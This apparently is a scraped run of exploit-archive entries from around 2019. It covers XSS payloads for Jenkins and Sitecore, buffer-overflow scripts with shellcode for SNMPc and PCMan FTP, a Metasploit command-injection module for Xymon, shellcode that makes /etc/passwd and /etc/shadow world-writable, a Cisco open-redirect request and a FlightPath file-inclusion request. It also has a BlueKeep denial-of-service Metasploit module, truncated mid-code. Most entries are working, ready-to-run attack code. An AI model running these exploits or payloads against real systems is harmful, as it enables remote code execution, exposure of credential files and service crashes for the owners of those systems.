↧
Microsoft Font Subsetting DLL ComputeFormat4CmapData Heap Corruption
↧
Jenkins Dependency Graph View 0.13 Cross Site Scripting
Jenkins Dependency Graph View plugin version 0.13 suffers from a persistent cross site scripting vulnerability.
c1ce6b865eb9188b93661b01f4e2d546# Exploit Title: Persistent XSS - Dependency Graph View Plugin(v0.13)
# Vendor Homepage:
https://wiki.jenkins.io/display/JENKINS/Dependency+Graph+View+Plugin
# Exploit Author: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: webapps
# Platform: Java
# CVE: CVE-2019-10349
# Jenkins issue: #SECURITY-1177
1. Description:
The "Display Name" field in General Options of the Configure module in
Jenkins was found to be accepting arbitrary value which when loaded in the
Dependency Graph View module gets execute which makes it vulnerable to a
Stored/Persistent XSS.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10349
2. Proof of Concept:
Vulnerable Source
http://{jenkins-hostname:port}/jobs/{projectname}/configure
Steps to Reproduce:
Login to Jenkins Server with valid credentials and ensure that the
dependency graph plugin is installed.
1. Click on configure the Jenkins plugin.
2. Select advanced options
3. Enter the XSS payload in the "Display Name" field
4. Navigate to Dependency Graph module
5. Observe the Executed Payload
6. Payload used for the demo:
<img src="a" onerror="alert('jenkinsxss')">
3. Solution:
As of publication of this advisory, there is no fix.
The plugin hsa been abandoned by the maintainer
Reference
https://jenkins.io/security/advisory/2019-07-11/#SECURITY-1177
--
Best Regards,
Ishaq Mohammed
https://about.me/security-prince
↧
↧
SNMPc Enterprise Edition 9 / 10 Mapping Filename Buffer Overflow
SNMPc Enterprise Edition versions 9 and 10 suffer from a mapping filename buffer overflow vulnerability.
109af1e27d2b7507c41e3905ac72c086#!/usr/bin/python
# -*- coding: utf-8 -*-
#--------------------------------------------------------------------#
# Exploit: SNMPc Enterprise Edition (9 & 10) (Mapping File Name BOF) #
# Date: 11 July 2019 #
# Exploit Author: @xerubus | mogozobo.com #
# Vendor Homepage: https://www.castlerock.com/ #
# Software Linke: https://www.castlerock.com/products/snmpc/ #
# Version: Enterprise Editioin 9 & 10 #
# Tested on: Windows 7 #
# CVE-ID: CVE-2019-13494 #
# Full write-up: https://www.mogozobo.com/?p=3534 #
#--------------------------------------------------------------------#
import sys, os
os.system('clear')
print("""\
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -= SNMPc_Mapping_BOF by @xerubus =-
| D _]/\ \ -= We all have something to hide =-
\___/ / /\ \\
(_ )( _)
@Xerubus
""")
filename="evilmap.csv"
junk = "A" * 2064
nseh = "\xeb\x07\x90\x90" # short jmp to 0018f58d \xeb\x07\x90\x90
seh = "\x05\x3c\x0e\x10" # 0x100e3c05 ; pop esi # pop edi # ret (C:\program files (x86)\snmpc network manager\CRDBAPI.dll)
# Pre-padding of mapping file. Note mandatory trailing character return.
pre_padding = (
"Name,Type,Address,ObjectID,Description,ID,Group1,Group2,Icon,Bitmap,Bitmap Scale,Shape/Thickness,Parent,Coordinates,Linked Nodes,Show Label,API Exec,MAC,Polling Agent,Poll Interval,Poll Timeout,Poll Retries,Status Variable,Status Value,Status Expression,Services,Status,Get Community,Set Community,Trap Community,Read Access Mode,Read/Write Access Mode,V3 NoAuth User,V3 Auth User,V3 Auth Password,V3 Priv Password"
"\"Root Subnet\",\"Subnet\",\"\",\"\",\"\",\"2\",\"000=Unknown\",\"\",\"auto.ico\",\"\",\"2\",\"Square\",\"(NULL)\",\"(0,0)\",\"N/A\",\"True\",\"auto.exe\",\"00 00 00 00 00 00\",\"127.0.0.1\",\"30\",\"2\",\"2\",\"\",\"0\",\"0\",\"\",\"Normal-Green\",\"public\",\"netman\",\"public\",\"SNMP V1\",\"SNMP V1\",\"\",\"\",\"\",\"\"\n"
"\"")
# Post-padding of mapping file. Note mandatory trailing character return.
post_padding = (
"\",\"Device\",\"127.0.0.1\",\"1.3.6.1.4.1.29671.2.107\",\"\",\"3\",\"000=Unknown\",\"000=Unknown\",\"auto.ico\",\"\",\"2\",\"Square\",\"Root Subnet(2)\",\"(-16,-64)\",\"N/A\",\"True\",\"auto.exe\",\"00 00 00 00 00 00\",\"127.0.0.1\",\"30\",\"2\",\"2\",\"\",\"0\",\"=\",\"\",\"Normal-Green\",\"public\",\"netman\",\"public\",\"SNMP V1\",\"SNMP V1\",\"\",\"\",\"\",\"\"\n")
# msfvenom —platform windows -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d" -f c
shellcode = (
"\xda\xcc\xd9\x74\x24\xf4\xba\xd9\xa1\x94\x48\x5f\x2b\xc9\xb1"
"\x31\x31\x57\x18\x83\xc7\x04\x03\x57\xcd\x43\x61\xb4\x05\x01"
"\x8a\x45\xd5\x66\x02\xa0\xe4\xa6\x70\xa0\x56\x17\xf2\xe4\x5a"
"\xdc\x56\x1d\xe9\x90\x7e\x12\x5a\x1e\x59\x1d\x5b\x33\x99\x3c"
"\xdf\x4e\xce\x9e\xde\x80\x03\xde\x27\xfc\xee\xb2\xf0\x8a\x5d"
"\x23\x75\xc6\x5d\xc8\xc5\xc6\xe5\x2d\x9d\xe9\xc4\xe3\x96\xb3"
"\xc6\x02\x7b\xc8\x4e\x1d\x98\xf5\x19\x96\x6a\x81\x9b\x7e\xa3"
"\x6a\x37\xbf\x0c\x99\x49\x87\xaa\x42\x3c\xf1\xc9\xff\x47\xc6"
"\xb0\xdb\xc2\xdd\x12\xaf\x75\x3a\xa3\x7c\xe3\xc9\xaf\xc9\x67"
"\x95\xb3\xcc\xa4\xad\xcf\x45\x4b\x62\x46\x1d\x68\xa6\x03\xc5"
"\x11\xff\xe9\xa8\x2e\x1f\x52\x14\x8b\x6b\x7e\x41\xa6\x31\x14"
"\x94\x34\x4c\x5a\x96\x46\x4f\xca\xff\x77\xc4\x85\x78\x88\x0f"
"\xe2\x77\xc2\x12\x42\x10\x8b\xc6\xd7\x7d\x2c\x3d\x1b\x78\xaf"
"\xb4\xe3\x7f\xaf\xbc\xe6\xc4\x77\x2c\x9a\x55\x12\x52\x09\x55"
"\x37\x31\xcc\xc5\xdb\x98\x6b\x6e\x79\xe5")
print "[+] Building payload.."
payload = "\x90" * 10 + shellcode
print "[+] Creating buffer.."
buffer = pre_padding + junk + nseh + seh + payload + "\x90" * 10 + post_padding
print "[+] Writing evil mapping file.."
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
print "[+] Done. Import evilmap.csv into SNMPc and A Wild Calc Appears!\n\n"
↧
Sitecore 9.0 Rev 171002 Cross Site Scripting
Sitecore version 9.0 rev 171002 suffers from a persistent cross site scripting vulnerability.
39d6c982acaa37a46cb0a8d2e1d7da4c# Exploit Title: Stored Cross Site Scripting (XSS) in Sitecore 9.0 rev 171002
# Date: July 11, 2019
# Exploit Author: Owais Mehtab
# Vendor Homepage: http://www.sitecore.net/en
# Version: 9.0 rev. 171002
# Tested on: Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519
# CVE : CVE-2019-13493
Vendor Description
------------------
Sitecore CMS makes it effortless to create content and experience rich websites that help you achieve your business goals such as increasing sales and search engine visibility, while being straight-forward to integrate and administer. Sitecore lets you deliver sites that are highly scalable, robust and secure. Whether you're focused on marketing, development and design, or providing site content, Sitecore delivers for you.
Description
------------
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
Vulnerability Class
--------------------
Cross-site Scripting (XSS) - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Proof of Concept
----------------
File Extension parameter is not properly escaped. This could lead to an XSS attack that could possibly affect administrators,users,editor.
1. Login to application and navigate to "https://example.com/sitecore/shell/Applications/Content Editor.aspx?sw_bw=1"
2. Go to media library and click on any image and edit it
3. Now in Extension input parameter inject any XSS vector like '"><svg=onload=prompt(2)>
↧
Xymon useradm Command Execution
This Metasploit module exploits a command injection vulnerability in Xymon versions before 4.3.25 which allows authenticated users to execute arbitrary operating system commands as the web server user. When adding a new user to the system via the web interface with useradm.sh, the user's username and password are passed to htpasswd in a call to system() without validation. This module has been tested successfully on Xymon version 4.3.10 on Debian 6.
5d1fdb4c7a1abc1fbc3c13a84a4a2eef##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Xymon useradm Command Execution',
'Description' => %q{
This module exploits a command injection vulnerability in Xymon
versions before 4.3.25 which allows authenticated users
to execute arbitrary operating system commands as the web
server user.
When adding a new user to the system via the web interface with
`useradm.sh`, the user's username and password are passed to
`htpasswd` in a call to `system()` without validation.
This module has been tested successfully on Xymon version 4.3.10
on Debian 6.
},
'License' => MSF_LICENSE,
'Author' => [
'Markus Krell', # Discovery
'bcoles' # Metasploit
],
'References' =>
[
['CVE', '2016-2056'],
['PACKETSTORM', '135758'],
['URL', 'https://lists.xymon.com/pipermail/xymon/2016-February/042986.html'],
['URL', 'https://www.securityfocus.com/archive/1/537522/100/0/threaded'],
['URL', 'https://sourceforge.net/p/xymon/code/7892/'],
['URL', 'https://www.debian.org/security/2016/dsa-3495']
],
'DisclosureDate' => '2016-02-14',
'Platform' => %w(unix linux solaris bsd),
'Targets' =>
[
[
'Unix CMD',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' => {
'Space' => 2048,
'BadChars' => "\x00\x0A\x0D",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python netcat php'
}
}
}
],
[
'Linux',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86,ARCH_X64],
}
],
[
'Solaris',
{
'Platform' => 'solaris',
'Arch' => [ARCH_X86]
}
],
[
'BSD',
{
'Platform' => 'bsd',
'Arch' => [ARCH_X86, ARCH_X64]
}
]
],
'Privileged' => false,
'DefaultTarget' => 0))
register_options([
OptString.new('TARGETURI', [
true, 'The base path to Xymon secure CGI directory', '/xymon-seccgi/'
]),
OptString.new('USERNAME', [true, 'The username for Xymon']),
OptString.new('PASSWORD', [true, 'The password for Xymon'])
])
end
def user
datastore['USERNAME']
end
def pass
datastore['PASSWORD']
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'useradm.sh'),
'authorization' => basic_auth(user, pass)
})
unless res
vprint_status "#{peer} - Connection failed"
return CheckCode::Unknown
end
if res.code == 401
vprint_status "#{peer} - Authentication failed"
return CheckCode::Unknown
end
if res.code == 404
vprint_status "#{peer} - useradm.sh not found"
return CheckCode::Safe
end
unless res.body.include?('Xymon')
vprint_status "#{peer} - Target is not a Xymon server."
return CheckCode::Safe
end
version = res.body.scan(/>Xymon ([\d\.]+)</).flatten.first
unless version
vprint_status "#{peer} - Could not determine Xymon version"
return CheckCode::Detected
end
vprint_status "#{peer} - Xymon version #{version}"
if Gem::Version.new(version) >= Gem::Version.new('4.3.25')
return CheckCode::Safe
end
CheckCode::Appears
end
def execute_command(cmd, opts = {})
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'useradm.sh'),
'method' => 'POST',
'authorization' => basic_auth(user, pass),
'vars_post' => Hash[{
'USERNAME' => "';#{cmd} & echo '",
'PASSWORD' => '',
'SendCreate' => 'Create'
}.to_a.shuffle]
}, 5)
return if session_created?
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
if res.code == 401
fail_with(Failure::NoAccess, 'Authentication failed')
end
unless res.code == 500
fail_with(Failure::Unknown, 'Unexpected reply')
end
print_good "#{peer} - Payload sent successfully"
res
end
def exploit
unless [Exploit::CheckCode::Detected, Exploit::CheckCode::Appears].include?(check)
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
if payload.arch.first == 'cmd'
execute_command(payload.encoded)
else
execute_cmdstager(linemax: 1_500)
end
end
end
↧
↧
Linux/x86 chmod 666 /etc/passwd / /etc/shadow Shellcode
61 bytes small Linux/x86 chmod 666 /etc/passwd and chmod 666 /etc/shadow shellcode.
1d275af34ac3eb4e6782353a61ffbebe# Exploit Title: Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow (61 bytes)
# Date: 10/07/2019
# Exploit Author: Xavier Invers Fornells
# Contact: x4v1s3c@gmail.com
# Tested on: Debian 4.19.28
# Architecture: x86
# Size: 61 bytes
#################################### chmod.nasm ####################################
global _start
section .text
_start:
push byte 15
pop eax
push byte 0x64
push word 0x7773
push 0x7361702f
push 0x6374652f
mov ebx, esp
push word 0x1b6
pop ecx
int 0x80
push byte 15
pop eax
push byte 0x77
push word 0x6f64
push 0x6168732f
push 0x6374652f
mov ebx, esp
push word 0x1b6
pop ecx
int 0x80
push byte 1
pop eax
int 0x80
#################################### shellcode.c ####################################
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x6a\x0f\x58\x6a\x64\x66\x68\x73\x77\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\x6a\x0f\x58\x6a\x77\x66\x68\x64\x6f\x68\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
↧
Cisco Small Business Switch Information Leakage / Open Redirect
Cisco Small Business switches versions 200, 300, and 500 suffer from information leakage and open redirection vulnerabilities.
eb2b5e1203a3fa2ae1b9100c12d53de7# Exploit Title: CISCO Small Business 200, 300, 500 Switches Multiple Vulnerabilities.
# Shodan query: /config/log_off_page.html
# Discovered Date: 07/03/2014
# Reported Date: 08/04/2019
# Exploit Author: Ramikan
# Website: http://fact-in-hack.blogspot.com
# Vendor Homepage:https://www.cisco.com/c/en/us/products/switches/small-business-300-series-managed-switches/index.html
# Affected Devices: The affected products are all Cisco Small Business 200, 300, and 500 Series Managed Switches with the web management interface enabled,
# Tested On: Cisco C300 Switch
# Version: 1.3.7.18
# CVE : CVE-2019-1943
# CVSS v3: 4.7 (AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N)
# Category:Hardware, Web Apps
# Reference : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect
*************************************************************************************************************************************
Vulnerability 1: Information Gathering
*************************************************************************************************************************************
Unauthenticated user can find the version number and device type by visiting this link directly.
Affected URL:
/cs703dae2c/device/English/dictionaryLogin.xml
*************************************************************************************************************************************
Vulnerability 2: Open Redirect due to host header.
*************************************************************************************************************************************
Can change to different domain under the host header and redirect the request to fake website and can be used for phishing attack also can be used for domain fronting.
Normal Request
GET / HTTP/1.1
Host: 10.1.1.120
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Connection: close
Cache-Control: max-age=0
Normal Response
HTTP/1.1 302 Redirect
Server: GoAhead-Webs
Date: Fri Mar 07 09:40:22 2014
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: https://10.21.151.120/cs703dae2c/
<html><head></head><body>
This document has moved to a new <a href="https://10.1.1.120/cs703dae2c/">location</a>.
Please update your documents to reflect the new location.
</body></html>
*************************************************************************************************************************************
POC
*************************************************************************************************************************************
Host Header changed to different domain (example google.com).
Request:
GET /cs703dae2c HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: activeLangId=English; isStackableDevice=false
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 302 Redirect
activeLangId=English; isStackableDevice=falseServer: GoAhead-Webs
Date: Fri Mar 07 09:45:26 2014
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://google.com/cs703dae2c/config/log_off_page.htm
<html><head></head><body>
This document has moved to a new <a href="http://google.com/cs703dae2c/config/log_off_page.htm">location</a>.
Please update your documents to reflect the new location.
</body></html>
The redirection is happening to http://google.com/cs703dae2c/config/log_off_page.htm. The attacker need to be in same network and should be able to modify the victims request on the wire in order to trigger this vulnerabilty.
*************************************************************************************************************************************
Attack Vector:
*************************************************************************************************************************************
Can be used for domain fronting.
curl -k --header "Host: attack.host.net""domainname of the cisco device"
*************************************************************************************************************************************
Vendor Response:
*************************************************************************************************************************************
Issue 1:
Due to the limited information given out, we are not considering it a vulnerability as such. Still, it would be better if it was not happening, so, we will treat it as a hardening enhancement.
Issue 2:
The developers won't be able to provide a fix for this in the short term (90 days), so, we are planning to disclose this issue through an advisory on July 17th 2019.
We have assigned CVE CVE-2019-1943 for this issue.
Reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect
*************************************************************************************************************************************
↧
PCMan FTP Server 2 ALLO Buffer Overflow
PCMan FTP Server 2 ALLO remote buffer overflow exploit.
01605b000736cd3698aa2c0a77b919b8# Vulnerability Title: PCMan FTP Server 2 - 'ALLO' Remote Buffer Overflow
# Discovered by: Nassim Asrir
# Tested on: win7 x32
# Thanks To : Chagi-Lagi - MY.Neggaoui
#!/usr/bin/python2.7
# -*- coding: utf-8 -*
import socket
ret = "\xf7\xf8\xc5\x75" #@ JMP ESP Kernel32.dll
calc =("\xdd\xc5\xd9\x74\x24\xf4\x5a\x31\xc9\xb8\xd1\x96\xc1\xcb\xb1"
"\x33\x31\x42\x17\x83\xc2\x04\x03\x93\x85\x23\x3e\xef\x42\x2a"
"\xc1\x0f\x93\x4d\x4b\xea\xa2\x5f\x2f\x7f\x96\x6f\x3b\x2d\x1b"
"\x1b\x69\xc5\xa8\x69\xa6\xea\x19\xc7\x90\xc5\x9a\xe9\x1c\x89"
"\x59\x6b\xe1\xd3\x8d\x4b\xd8\x1c\xc0\x8a\x1d\x40\x2b\xde\xf6"
"\x0f\x9e\xcf\x73\x4d\x23\xf1\x53\xda\x1b\x89\xd6\x1c\xef\x23"
"\xd8\x4c\x40\x3f\x92\x74\xea\x67\x03\x85\x3f\x74\x7f\xcc\x34"
"\x4f\x0b\xcf\x9c\x81\xf4\xfe\xe0\x4e\xcb\xcf\xec\x8f\x0b\xf7"
"\x0e\xfa\x67\x04\xb2\xfd\xb3\x77\x68\x8b\x21\xdf\xfb\x2b\x82"
"\xde\x28\xad\x41\xec\x85\xb9\x0e\xf0\x18\x6d\x25\x0c\x90\x90"
"\xea\x85\xe2\xb6\x2e\xce\xb1\xd7\x77\xaa\x14\xe7\x68\x12\xc8"
"\x4d\xe2\xb0\x1d\xf7\xa9\xde\xe0\x75\xd4\xa7\xe3\x85\xd7\x87"
"\x8b\xb4\x5c\x48\xcb\x48\xb7\x2d\x23\x03\x9a\x07\xac\xca\x4e"
"\x1a\xb1\xec\xa4\x58\xcc\x6e\x4d\x20\x2b\x6e\x24\x25\x77\x28"
"\xd4\x57\xe8\xdd\xda\xc4\x09\xf4\xb8\x8b\x99\x94\x10\x2e\x1a"
"\x3e\x6d")
buffer1= '\x41' * 2007 + ret + "\x90" * 40 + calc
print "Sending..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.108.129',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS \r\n')
s.recv(1024)
s.send('ALLO' + buffer1 + '\r\n')
s.close()
↧
FlightPath Local File Inclusion
FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability.
81a5a17dad2e62aa8208195f197d9a8c# Exploit Title: FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion
# Date: 07-07-2019
# Exploit Author: Mohammed Althibyani
# Vendor Homepage: http://getflightpath.com
# Software Link: http://getflightpath.com/project/9/releases
# Version: < 4.8.2 & < 5.0-rc2
# Tested on: Kali Linux
# CVE : CVE-2019-13396
# Parameters : include_form
# POST Method:
use the login form to get right form_token [ you can use wrong user/pass ]
This is how to POST looks like:
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D¤t_student_id=&user=test&password=test&btn_submit=Login
# modfiy the POST request to be:
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd
# Greats To : Ryan Saaty, Mohammed Al-Howsa & Haboob Team.
↧
↧
Microsoft Windows RDP BlueKeep Denial Of Service
Microsoft Windows Remote Desktop BlueKeep denial of service exploit.
03ea74e7a141e90ebbfc356da5c86bfd# Exploit Title: Bluekeep Denial of Service (metasploit module)
# Shodan Dork: port:3389
# Date: 07/14/2019
# Exploit Author: RAMELLA Sebastien (https://github.com/mekhalleh/)
# Vendor Homepage: https://microsoft.com
# Version: all affected RDP services by cve-2019-0708
# Tested on: Windows XP (32-bits) / Windows 7 (64-bits)
# CVE : 2019-0708
# I just modified the initial metasploit module for this vuln to produce a denial of service attack.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
Rank = NormalRanking
include Msf::Auxiliary::Dos
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE',
'Description' => %q{
This module checks a range of hosts for the CVE-2019-0708 vulnerability
by binding the MS_T120 channel outside of its normal slot and sending
DoS packets.
},
'Author' =>
[
'National Cyber Security Centre', # Discovery
'JaGoTu', # Module
'zerosum0x0', # Module
'Tom Sellers', # TLS support and documented packets
'RAMELLA Sebastien' # Denial of service module
],
'References' =>
[
[ 'CVE', '2019-0708' ],
[ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ]
],
'DisclosureDate' => '2019-05-14',
'License' => MSF_LICENSE,
'Notes' =>
{
'Stability' => [ CRASH_OS_DOWN ],
'AKA' => ['BlueKeep']
}
))
register_options(
[
OptAddress.new('RDP_CLIENT_IP', [ true, 'The client IPv4 address to report during connection', '192.168.0.100']),
OptString.new('RDP_CLIENT_NAME', [ false, 'The client computer name to report during connection', 'rdesktop']),
OptString.new('RDP_DOMAIN', [ false, 'The client domain name to report during connection', '']),
OptString.new('RDP_USER', [ false, 'The username to report during connection.']),
OptAddressRange.new("RHOSTS", [ true, 'Target address, address range or CIDR identifier']),
OptInt.new('RPORT', [true, 'The target TCP port on which the RDP protocol response', 3389])
]
)
end
# ------------------------------------------------------------------------- #
def bin_to_hex(s)
return(s.each_byte.map { | b | b.to_s(16).rjust(2, '0') }.join)
end
def bytes_to_bignum(bytesIn, order = "little")
bytes = bin_to_hex(bytesIn)
if(order == "little")
bytes = bytes.scan(/../).reverse.join('')
end
s = "0x" + bytes
return(s.to_i(16))
end
## https://www.ruby-forum.com/t/integer-to-byte-string-speed-improvements/67110
def int_to_bytestring(daInt, num_chars = nil)
unless(num_chars)
bits_needed = Math.log(daInt) / Math.log(2)
num_chars = (bits_needed / 8.0).ceil
end
if(pack_code = { 1 => 'C', 2 => 'S', 4 => 'L' }[ num_chars ])
[daInt].pack(pack_code)
else
a = (0..(num_chars)).map{ | i |
(( daInt >> i*8 ) & 0xFF ).chr
}.join
a[0..-2] # Seems legit lol!
end
end
def open_connection()
begin
connect()
sock.setsockopt(::Socket::IPPROTO_TCP, ::Socket::TCP_NODELAY, 1)
rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
vprint_error("Connection error: #{e.message}")
return(false)
end
return(true)
end
def rsa_encrypt(bignum, rsexp, rsmod)
return((bignum ** rsexp) % rsmod)
end
# ------------------------------------------------------------------------- #
## Used to abruptly abort scanner for a given host.
class RdpCommunicationError < StandardError
end
## Define standard RDP constants.
class RDPConstants
PROTOCOL_RDP = 0
end
DEFAULT_CHANNELS_DEFS =
"\x04\x00\x00\x00" + # channelCount: 4
## Channels definitions consist of a name (8 bytes) and options flags
## (4 bytes). Names are up to 7 ANSI characters with null termination.
"\x72\x64\x70\x73\x6e\x64\x00\x00" + # rdpsnd
"\x0f\x00\x00\xc0" +
"\x63\x6c\x69\x70\x72\x64\x72\x00" + # cliprdr
"\x00\x00\xa0\xc0" +
"\x64\x72\x64\x79\x6e\x76\x63" + # drdynvc
"\x00\x00\x00\x80\xc0" +
"\x4d\x53\x5f\x54\x31\x32\x30" + # MS_T120
"\x00\x00\x00\x00\x00"
## Builds x.224 Data (DT) TPDU - Section 13.7
def rdp_build_data_tpdu(data)
tpkt_length = data.length + 7
"\x03\x00" + # TPKT Header version 03, reserved 0
[tpkt_length].pack("S>") + # TPKT length
"\x02\xf0" + # X.224 Data TPDU (2 bytes)
"\x80" + # X.224 End Of Transmission (0x80)
data
end
## Build the X.224 packet, encrypt with Standard RDP Security as needed.
## Default channel_id = 0x03eb = 1003.
def rdp_build_pkt(data, rc4enckey = nil, hmackey = nil, channel_id = "\x03\xeb", client_info = false, rdp_sec = true)
flags = 0
flags |= 0b1000 if(rdp_sec) # Set SEC_ENCRYPT
flags |= 0b1000000 if(client_info) # Set SEC_INFO_PKT
pdu = ""
## TS_SECURITY_HEADER - 2.2.8.1.1.2.1
## Send when the packet is encrypted w/ Standard RDP Security and in all Client Info PDUs.
if(client_info || rdp_sec)
pdu << [flags].pack("S<") # flags "\x48\x00" = SEC_INFO_PKT | SEC_ENCRYPT
pdu << "\x00\x00" # flagsHi
end
if(rdp_sec)
## Encrypt the payload with RDP Standard Encryption.
pdu << rdp_hmac(hmackey, data)[0..7]
pdu << rdp_rc4_crypt(rc4enckey, data)
else
pdu << data
end
user_data_len = pdu.length
udl_with_flag = 0x8000 | user_data_len
pkt = "\x64" # sendDataRequest
pkt << "\x00\x08" # intiator userId (TODO: for a functional client this isn't static)
pkt << channel_id # channelId
pkt << "\x70" # dataPriority
pkt << [udl_with_flag].pack("S>")
pkt << pdu
return(rdp_build_data_tpdu(pkt))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/73d01865-2eae-407f-9b2c-87e31daac471
## Share Control Header - TS_SHARECONTROLHEADER - 2.2.8.1.1.1.1
def rdp_build_share_control_header(type, data, channel_id = "\xf1\x03")
total_len = data.length + 6
return(
[total_len].pack("S<") + # totalLength - includes all headers
[type].pack("S<") + # pduType - flags 16 bit, unsigned
channel_id + # PDUSource: 0x03f1 = 1009
data
)
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4b5d4c0d-a657-41e9-9c69-d58632f46d31
## Share Data Header - TS_SHAREDATAHEADER - 2.2.8.1.1.1.2
def rdp_build_share_data_header(type, data)
uncompressed_len = data.length + 4
return(
"\xea\x03\x01\x00" + # shareId: 66538
"\x00" + # pad1
"\x01" + # streamID: 1
[uncompressed_len].pack("S<") + # uncompressedLength - 16 bit, unsigned int
[type].pack("C") + # pduType2 - 8 bit, unsigned int - 2.2.8.1.1.2
"\x00" + # compressedType: 0
"\x00\x00" + # compressedLength: 0
data
)
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/6c074267-1b32-4ceb-9496-2eb941a23e6b
## Virtual Channel PDU 2.2.6.1
def rdp_build_virtual_channel_pdu(flags, data)
data_len = data.length
return(
[data_len].pack("L<") + # length
[flags].pack("L<") + # flags
data
)
end
def rdp_calculate_rc4_keys(client_random, server_random)
## preMasterSecret = First192Bits(ClientRandom) + First192Bits(ServerRandom).
preMasterSecret = client_random[0..23] + server_random[0..23]
## PreMasterHash(I) = SaltedHash(preMasterSecret, I)
## MasterSecret = PreMasterHash(0x41) + PreMasterHash(0x4242) + PreMasterHash(0x434343).
masterSecret = rdp_salted_hash(preMasterSecret, "A", client_random,server_random) + rdp_salted_hash(preMasterSecret, "BB", client_random, server_random) + rdp_salted_hash(preMasterSecret, "CCC", client_random, server_random)
## MasterHash(I) = SaltedHash(MasterSecret, I)
## SessionKeyBlob = MasterHash(0x58) + MasterHash(0x5959) + MasterHash(0x5A5A5A).
sessionKeyBlob = rdp_salted_hash(masterSecret, "X", client_random, server_random) + rdp_salted_hash(masterSecret, "YY", client_random, server_random) + rdp_salted_hash(masterSecret, "ZZZ", client_random, server_random)
## InitialClientDecryptKey128 = FinalHash(Second128Bits(SessionKeyBlob)).
initialClientDecryptKey128 = rdp_final_hash(sessionKeyBlob[16..31], client_random, server_random)
## InitialClientEncryptKey128 = FinalHash(Third128Bits(SessionKeyBlob)).
initialClientEncryptKey128 = rdp_final_hash(sessionKeyBlob[32..47], client_random, server_random)
macKey = sessionKeyBlob[0..15]
return initialClientEncryptKey128, initialClientDecryptKey128, macKey, sessionKeyBlob
end
def rdp_connection_initiation()
## Code to check if RDP is open or not.
vprint_status("Verifying RDP protocol...")
vprint_status("Attempting to connect using RDP security")
rdp_send(pdu_negotiation_request(datastore['RDP_USER'], RDPConstants::PROTOCOL_RDP))
received = sock.get_once(-1, 5)
## TODO: fix it.
if (received and received.include? "\x00\x12\x34\x00")
return(true)
end
return(false)
end
